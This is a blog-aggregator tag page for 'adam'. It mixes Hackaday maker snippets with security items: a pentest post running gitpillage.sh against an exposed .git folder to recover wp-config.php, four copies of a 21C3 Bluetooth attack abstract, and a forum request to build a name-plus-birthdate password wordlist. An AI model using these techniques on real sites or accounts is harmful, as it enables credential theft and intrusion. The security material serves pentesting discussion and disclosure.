«
Expand/Collapse
27 items tagged "adam"
Related tags:
phone [+],
salzburg [+],
motorola models [+],
martin herfurt [+],
marcel holtmann [+],
marcel [+],
industry [+],
home [+],
chaos communication congress [+],
bluetooth [+],
adam laurie marcel holtmann [+],
digital [+],
arduino [+],
project [+],
privilege escalation vulnerability [+],
microsoft [+],
lsass [+],
hackaday [+],
escalation [+],
classic [+],
cameras [+],
adlds [+],
when [+],
wget [+],
washington dc metro [+],
washington [+],
wallet [+],
video game [+],
usa [+],
uncovering [+],
twittertape [+],
trammell [+],
tool [+],
tight places [+],
ticker tape machine [+],
technology [+],
teague [+],
tad [+],
system [+],
stock [+],
stereo [+],
speech [+],
someone [+],
solution paths [+],
soldering irons [+],
soda straws [+],
sniffer [+],
smduino [+],
sketches [+],
series [+],
security [+],
science [+],
savage [+],
sand [+],
room locks [+],
room [+],
ron [+],
robber barons [+],
rfid [+],
resistor [+],
radio [+],
polaroid [+],
pinewood [+],
pillage [+],
php [+],
pc [+],
password [+],
old technology [+],
old macs [+],
nbsp [+],
misc [+],
mill [+],
merit [+],
marine speakers [+],
manual camera [+],
maker [+],
mains power [+],
machine [+],
mac roms [+],
lst [+],
links [+],
lifehacker [+],
leaps [+],
keypad [+],
joe [+],
jeremy [+],
jamie [+],
irons in the fire [+],
iron [+],
internet [+],
instant replay [+],
influx [+],
index files [+],
home security system [+],
home security monitoring [+],
holes [+],
hakko soldering iron [+],
giving a speech [+],
git [+],
game [+],
film [+],
festival [+],
engineering [+],
elegant package [+],
electronic components [+],
easter eggs [+],
easter [+],
dorm [+],
dj controller [+],
diy philosophy [+],
diy [+],
ditches [+],
development [+],
dc metro area [+],
dc [+],
current project [+],
cool project [+],
controller [+],
computer [+],
commercial venture [+],
code [+],
cnc mill [+],
cnc machines [+],
cnc machine [+],
cnc [+],
changing colors [+],
challenge [+],
cellphones [+],
cards [+],
candlestick phone [+],
camera [+],
box [+],
bill nye [+],
bezel [+],
beach [+],
bay area [+],
battery [+],
barackobama [+],
badge [+],
backend [+],
audio [+],
arduino based [+],
appliances [+],
apollo 13 [+],
afar [+],
adrian [+],
adan [+],
adam savage [+],
actionscript [+],
abram [+],
abraham [+],
abel [+],
abdullah [+],
Software [+],
Pentesting [+],
Learn [+],
hacks [+]
-
-
6:00
»
Carnal0wnage
Ron over at SkullSecurity put out a post on
Using "Git Clone" to get Pwn3DWorth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.
unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].
So i posed the following to twitter
to which i got two great replies.
The first one pointed me to:
https://github.com/evilpacket/DVCS-Pillage(thanks Kos)
and the second was a shortcut to using the tool by the author (thanks Adam)
DVCS is pretty handy. With it you can pillage accessible GIT, GS and BZR repos. Similar functionality for svn already exists in
metasploit Does it work? yes mostly...an example:
user@ubuntu:~/pentest/DVCS-Pillage$ ./gitpillage.sh www.site.com/.git/Initialized empty Git repository in /home/user/pentest/DVCS-Pillage/www.site.com/.git/
Getting refs/heads/master
Getting objects/ef/72174d7a5d893XXXXXXXXXXXXXXXXXXXX
Getting index
Getting .gitignore
curl: (22) The requested URL returned error: 404
About to make 245 requests to www.site.com; This could take a while
Do you want to continue? (y/n)y
Getting objects/01/f0d130adf04d66XXXXXXXXXXXXXXXX9e4ddb41
Getting objects/49/403ecc2d8a343da9XXXXXXXXXXXXXXX3f094d9
Getting objects/d3/1195ab0e695f8b89XXXXXXXXXXXXXXXXXa3af5
Getting objects/f9/b926f07XXXXXXXXXXXXXXXXXXXX567cf438c6a
Getting objects/57/78a12e2edebXXXXXXXXXXXXXXXXXXX3f3a0e8d
---snip---
trying to checkout files
error: git checkout-index: unable to read sha1 file of wp-register.php (caad4f2b21c37bXXXXXXXXXXXXXXX81c7949ec4f74e)
#### Potentially Interesting Files ####
wp-admin/export.php - [CHECKED OUT]
wp-admin/includes/export.php - [CHECKED OUT]
wp-admin/setup-config.php - [CHECKED OUT]
wp-config-sample.php - [CHECKED OUT]
wp-config.php - [CHECKED OUT]
wp-settings.php - [CHECKED OUT]
anything useful in there?
user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information b
y
* visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');
/** MySQL database username */
define('DB_USER', 'site_wp');
/** MySQL database password */
define('DB_PASSWORD', 'XXXXXXXX');
another way to turn a low to pwned :-)
-
-
21:49
»
SecDocs
Authors:
Adam Laurie Marcel Holtmann Martin Herfurt Tags:
bluetooth Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: Bluesnarfing, bluebugging and backdooring have been in the spotlight for over a year now, and, finally, the mobile phone industry have reacted and are issuing fixes for these very serious problems. Accordingly, the time has come for full disclosure... In November 2003, Adam discovered serious flaws in the authentication and data transfer mechanisms on some bluetooth enabled devices, and, in particular, mobile phones including commonly used Nokia, Sony Ericsson and Motorola models. Shortly thereafter, Martin Herfurt of Salzburg Research Forschungsgesellschaft mbH expanded on these problems, and teamed up with Adam to investigate further. At EuroFoo in August 2004, Adam and Marcel Holtmann met, and agreed to colaborate on looking into the underlying causes of the problems, as well as sharing information and resources to try and gain a better foothold for the opensource community within the official bluetooth organistaions. This talk will cover the issues arising out of the flaws, including loss of personal data, identity theft, phone tapping, tracking, fraud and theft of service. The threat to individuals and corporates will be examined, and statistics and examples from the real world presented, as well as live demonstrations and full disclosure of techniques used in each of the attacks. Details of how the industry reacted, what they did, didn't and should have done will also be discussed, as well as some positive steps that have been taken as a direct result of the original problem disclosures. This will be a fun talk and a real eye-opener for those with bluetooth enabled devices, and will start with an introduction into the Bluetooth architecture and the security mechanisms offered by it so that it is possible to understand how and why the different attacks are working. Further there will be an introduction into the Linux Bluetooth stack BlueZ that will be used for doing the attacks and showing exactly how these attacks are working.
-
21:49
»
SecDocs
Authors:
Adam Laurie Marcel Holtmann Martin Herfurt Tags:
bluetooth Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: Bluesnarfing, bluebugging and backdooring have been in the spotlight for over a year now, and, finally, the mobile phone industry have reacted and are issuing fixes for these very serious problems. Accordingly, the time has come for full disclosure... In November 2003, Adam discovered serious flaws in the authentication and data transfer mechanisms on some bluetooth enabled devices, and, in particular, mobile phones including commonly used Nokia, Sony Ericsson and Motorola models. Shortly thereafter, Martin Herfurt of Salzburg Research Forschungsgesellschaft mbH expanded on these problems, and teamed up with Adam to investigate further. At EuroFoo in August 2004, Adam and Marcel Holtmann met, and agreed to colaborate on looking into the underlying causes of the problems, as well as sharing information and resources to try and gain a better foothold for the opensource community within the official bluetooth organistaions. This talk will cover the issues arising out of the flaws, including loss of personal data, identity theft, phone tapping, tracking, fraud and theft of service. The threat to individuals and corporates will be examined, and statistics and examples from the real world presented, as well as live demonstrations and full disclosure of techniques used in each of the attacks. Details of how the industry reacted, what they did, didn't and should have done will also be discussed, as well as some positive steps that have been taken as a direct result of the original problem disclosures. This will be a fun talk and a real eye-opener for those with bluetooth enabled devices, and will start with an introduction into the Bluetooth architecture and the security mechanisms offered by it so that it is possible to understand how and why the different attacks are working. Further there will be an introduction into the Linux Bluetooth stack BlueZ that will be used for doing the attacks and showing exactly how these attacks are working.
-
21:49
»
SecDocs
Authors:
Adam Laurie Marcel Holtmann Martin Herfurt Tags:
bluetooth Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: Bluesnarfing, bluebugging and backdooring have been in the spotlight for over a year now, and, finally, the mobile phone industry have reacted and are issuing fixes for these very serious problems. Accordingly, the time has come for full disclosure... In November 2003, Adam discovered serious flaws in the authentication and data transfer mechanisms on some bluetooth enabled devices, and, in particular, mobile phones including commonly used Nokia, Sony Ericsson and Motorola models. Shortly thereafter, Martin Herfurt of Salzburg Research Forschungsgesellschaft mbH expanded on these problems, and teamed up with Adam to investigate further. At EuroFoo in August 2004, Adam and Marcel Holtmann met, and agreed to colaborate on looking into the underlying causes of the problems, as well as sharing information and resources to try and gain a better foothold for the opensource community within the official bluetooth organistaions. This talk will cover the issues arising out of the flaws, including loss of personal data, identity theft, phone tapping, tracking, fraud and theft of service. The threat to individuals and corporates will be examined, and statistics and examples from the real world presented, as well as live demonstrations and full disclosure of techniques used in each of the attacks. Details of how the industry reacted, what they did, didn't and should have done will also be discussed, as well as some positive steps that have been taken as a direct result of the original problem disclosures. This will be a fun talk and a real eye-opener for those with bluetooth enabled devices, and will start with an introduction into the Bluetooth architecture and the security mechanisms offered by it so that it is possible to understand how and why the different attacks are working. Further there will be an introduction into the Linux Bluetooth stack BlueZ that will be used for doing the attacks and showing exactly how these attacks are working.
-
-
21:46
»
SecDocs
Authors:
Adam Laurie Marcel Holtmann Martin Herfurt Tags:
bluetooth Event:
Chaos Communication Congress 21th (21C3) 2004 Abstract: Bluesnarfing, bluebugging and backdooring have been in the spotlight for over a year now, and, finally, the mobile phone industry have reacted and are issuing fixes for these very serious problems. Accordingly, the time has come for full disclosure... In November 2003, Adam discovered serious flaws in the authentication and data transfer mechanisms on some bluetooth enabled devices, and, in particular, mobile phones including commonly used Nokia, Sony Ericsson and Motorola models. Shortly thereafter, Martin Herfurt of Salzburg Research Forschungsgesellschaft mbH expanded on these problems, and teamed up with Adam to investigate further. At EuroFoo in August 2004, Adam and Marcel Holtmann met, and agreed to colaborate on looking into the underlying causes of the problems, as well as sharing information and resources to try and gain a better foothold for the opensource community within the official bluetooth organistaions. This talk will cover the issues arising out of the flaws, including loss of personal data, identity theft, phone tapping, tracking, fraud and theft of service. The threat to individuals and corporates will be examined, and statistics and examples from the real world presented, as well as live demonstrations and full disclosure of techniques used in each of the attacks. Details of how the industry reacted, what they did, didn't and should have done will also be discussed, as well as some positive steps that have been taken as a direct result of the original problem disclosures. This will be a fun talk and a real eye-opener for those with bluetooth enabled devices, and will start with an introduction into the Bluetooth architecture and the security mechanisms offered by it so that it is possible to understand how and why the different attacks are working. Further there will be an introduction into the Linux Bluetooth stack BlueZ that will be used for doing the attacks and showing exactly how these attacks are working.
-
-
10:01
»
Hack a Day
The picture you see above is taken from the ROM of a Macintosh SE made in the late 1980s. This black and white image remained buried inside old Macs until [Adam] and [Trammell] at NYC Resistor reverse engineered these old Mac ROMs and found a few really cool Easter eggs. [Adam] and [Trammell] have been dumping ROMs [...]
-
-
13:01
»
Hack a Day
This simple device, paired with some creating code will let you become your own home security monitoring service. It’s called the PhantomLink and [Adam] started the project as a commercial venture. He recently decided to go open source with the hardware and will soon be posting a guide on how to program your own web [...]
-
-
6:01
»
Hack a Day
Apollo 13 DJ controller Follow Up [Adam] had a really impressive DJ controller build featured here recently. Many of you had more questions about the internals and such, so this post should clarify a few things. He’s still got a few more updates to make, but promises to reveal all if given enough time! Noise [...]
-
-
12:01
»
Hack a Day
[Adam] and [Jeremy] took on the challenge of designing a system that would make it easy to control appliances from the Internet. We’ve seen the concept many times before; it involves some method of switching mains power and connecting that mechanism to the Internet. This design is both well planned and nicely executed. We’re always [...]
-
-
12:01
»
Hack a Day
RFID hacking has been around for years, but so far all the builds to sniff data out of someone’s wallet have been too large, too small a range, or were much too complicated for a random Joe to build in his workshop. [Adam]‘s RFID sniffer gets around all those problems, and provides yet another reason to [...]
-
-
6:01
»
Hack a Day
[Adam Savage] gives an interesting talk titled “why we make” at the Bay Area MakerFaire. Many have been comparing the leaps we’ve been taking in home engineering/hacking/making etc, to the early days of computers. People are making things at home that are actually making a difference. [Adam] is a huge collector and maker of movie [...]
-
-
13:08
»
Hack a Day
If you’re around the Washington, DC metro area next weekend, here’s something for you. It’s the USA Science and Engineering festival, and if you’ve ever wanted to talk to [Adam] and [Jamie] from Mythbusters, [Bill Nye], and several astronauts, this is where you should be next weekend. This is the second USA Science and Engineering [...]
-
-
9:01
»
Hack a Day
When it’s time to get started on a project and put our irons in the fire, we usually reach for a nice Weller or Hakko soldering iron. Unfortunately, that isn’t possible when we’re soldering something away from a wall outlet. Portable soldering irons usually range from slightly to completely terrible, and [Adam] thought he could do [...]
-
-
13:01
»
Hack a Day
[Adam] was tired of plopping the same components over and over into his Arduino-based designs. He spent part of his weekend laying out a small board that would host everything he needed and could be built as a single component for all future projects. Above you can see the project he calls SMDuino, an Arduino [...]
-
-
11:57
»
Hack a Day
During the gilded age, oil magnates, entrepreneurs, and robber barons would have a ticker tape machine in their study. This machine would print stock and commodity prices and chart these men’s assets climbing higher and higher. A lot has changed in 100 years, as now [Adam] can be kept apprised of what @KimKardashian, @BarackObama and @stephenfry ate [...]
-
-
13:41
»
Hack a Day
As a boy scout properly acculturated into the DIY philosophy, [Adam] really wanted to get his hands on the new Inventing merit badge. The merit badge required solving a problem, so of course a pinewood derby instant replay system was the obvious solution. After thinking through a few solution paths like a radio-controlled camera that follows the cars, [...]
-
-
5:01
»
Hack a Day
Like just about everyone else out there, [Adam] thinks that CNC machines are pretty cool – so cool that he decided to build one of his own from scratch. The CNC machine was constructed mostly out of MDF and scrap wood, with drawer slides used for smooth gantry movement. An off-brand rotary tool was used [...]
-
-
8:05
»
Hack a Day
[Adam] from Teague Labs wrote in to share a new gadget they built to help demonstrate the capabilities of the Teagueduino. Their table top video game in a box was made with a bunch of electronic components they had sitting around, as well as soda straws, plenty of painter’s tape, and some popscicle sticks. When [...]
-
-
10:01
»
Hack a Day
[Adam Ben-Dror] recently tipped us off to a project that he worked on recently. In this build he gutted an old candlestick-style phone and added modern technology to make it work as a cordless phone. We really liked this project because he married together new and old technology into an elegant package. There are a [...]
-
-
10:15
»
Hack a Day
When prototyping a project using an Arduino, there are a few things that are pretty much required equipment. A computer for generating sketches is typically one of those things, but [Adam] over at Teague Labs is looking to change all that with his current project, the Computerless Arduino. Instead of using a computer to alter [...]
-
-
13:00
»
Hack a Day
[Adam] over at lifehacker is putting together a series on the principles of programming called “Learn to code”. They are using Javascript as a basis to teach the fundamentals that would allow you to get stuff done in any similar language, like actionscript. After you’ve got these basics down, even moving to an object oriented [...]
-
-
13:08
»
Hack a Day
It’s that time of the year again. The leaves are changing colors, it’s getting colder outside, and all the littler hackers are off to college. Which means we get to see an influx of dorm room locks and openers. [Adam] is back at it again with a new keypad dorm room lock. Last year he [...]
-
-
8:42
»
Hack a Day
[Adam] sent in this cool project. He has modified a Polaroid J66 camera to use modern film. Most of the initial modifications look fairly simple, but things get a little more complicated when they also convert it to a fully manual camera. There is a section that explains a neat little trick of using a [...]
-
-
6:01
»
remote-exploit & backtrack
i have two password tables:
mens_name.lst
Code:
Aaron
Abdiel
Abdullah
Abel
Abraham
Abram
Adam
Adan
Addison
Aden
Aditya
Adolfo
Adonis
Adrian
Adriel
Adrien
Agustin
...etc
and dob.lst (dates of birth)
Code:
25321
32521
2531921
3251921
1921/25/03
25/03/1921
03/25/1921
25/3/21
3/25/21
25/3/1921
3/25/1921
1921-25-03
25-03-1921
03-25-1921
25-3-21
3-25-21
25-3-1921
3-25-1921
1921.25.03
25.03.1921
03.25.1921
...etc
my objective is to merge the two so i have a single list looking like this:
Code:
Aaron25321
Aaron32521
Aaron2531921
Aaron3251921
Aaron1921/25/03
Aaron25/03/1921
Aaron03/25/1921
Aaron25/3/21
..etc
Abdiel25321
Abdiel32521
Abdiel2531921
Abdiel3251921
Abdiel1921/25/03
Abdiel25/03/1921
Abdiel03/25/1921
Abdiel25/3/21
..etc
Abdullah25321
Abdullah32521
Abdullah2531921
Abdullah3251921
Abdullah1921/25/03
Abdullah25/03/1921
Abdullah03/25/1921
Abdullah25/3/21
....etc
If anybody knows how to do this and would like to share the info with i'd be so grateful. I'd also quite happily share the finished product with you :)
regards imcookie
-
-
14:00
»
Hack a Day
[Adam] wanted a stereo that could stand up to rain and keep sand out. He ended up building this beach stereo out of a cooler. The cooler’s already made to be water tight. He cut holes in the front and back for marine speakers and added a water-tight bezel and cover for the controls on [...]
